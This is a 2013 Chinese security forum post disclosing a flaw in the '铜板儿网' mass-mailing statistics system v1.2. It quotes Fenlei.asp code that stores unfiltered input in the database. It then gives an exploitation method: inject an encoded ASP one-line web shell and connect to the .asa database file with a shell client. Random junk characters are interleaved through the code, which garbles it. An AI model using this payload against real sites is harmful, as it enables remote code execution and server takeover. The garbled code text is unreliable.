找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 1850|回复: 0
打印 上一主题 下一主题

铜板儿网邮件群发统计系统 v1.2 漏洞

[复制链接]
跳转到指定楼层
楼主
发表于 2013-3-14 20:14:57 | 只看该作者 回帖奖励 |正序浏览 |阅读模式
'Fenlei.asp
9 R) r$ Z5 J) W& @+ _1 Y  k. [6 H( w) E0 t# h
IF Request.QueryString("Action")="del" Then
/ k# o$ c/ [4 m& G- U) g: XID=Request.QueryString("ID") % s) X% h* \/ i/ g
IF Countss ("tui","Fenlei",ID )<>0 then 4 D: I8 b! X, n
'略 ) _8 h6 B8 N, i% A
IF Request.QueryString("Action")="Add" Then ( |& p4 f! b9 C6 v( c' p% f
Tname=Request.Form("Typename") . I' J- p# l) n& C2 z9 s& |3 u
Set Rs=Server.CreateObject("adodb.Recordset") ' o  N% |& i" C" x4 `
Sql="Select * From Fenlei Order by id Desc "
9 n7 u% |: D! m& CRs.Open Sql,Conn,1,3
' U0 H; S& |5 IRs.Addnew , V8 U& L& o2 ?  t+ P2 ~9 e
Rs("Typename")=Tname
0 A3 X; `* G- ~, C3 V+ f& V'略 . j  @' D7 Q3 @( w; i; w
Set Rs=Server.CreateObject("adodb.Recordset") 6 W7 s8 F5 c( U( k
Sql="Select * From Fenlei Order by id Desc "
8 G, V$ M! O2 Y" [Rs.Open Sql,Conn,1,1   s& h( s4 j: L
'略
) ]& z) q% }7 M%>
; W- A7 t) X" N& J" e7 Y8 G1 o - Q& I* ~- q$ @) }, n

6 X5 H3 g2 E2 o! s0 u
5 B+ @' W0 m& k- n( g没有过滤,直接写入数据库。
; Z6 B0 N4 A2 k6 s7 p8 b+ M : S7 ~6 k; Z# d; [
利用方法:5 {9 ]( C7 L  I+ C# q

2 [0 i8 c) _. n0 W" L% D% ~插入:┼攠數畣整爠煥敵瑳∨≡┩>4 d3 P( W* u4 i2 o( I7 w( L3 ^, j
* i* S* `( R, z/ P  R
9 @1 w0 m' a$ s& y# {7 F
连接: http://www.xxx.com/###tongbaner.asa
" Y: {& \& X2 ~' O' V- x'默认安装文件: 4 x) e2 q! @1 O) t' W$ m9 }
'install.asp$ g/ B0 j3 {* v% U: z9 j" i$ k
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表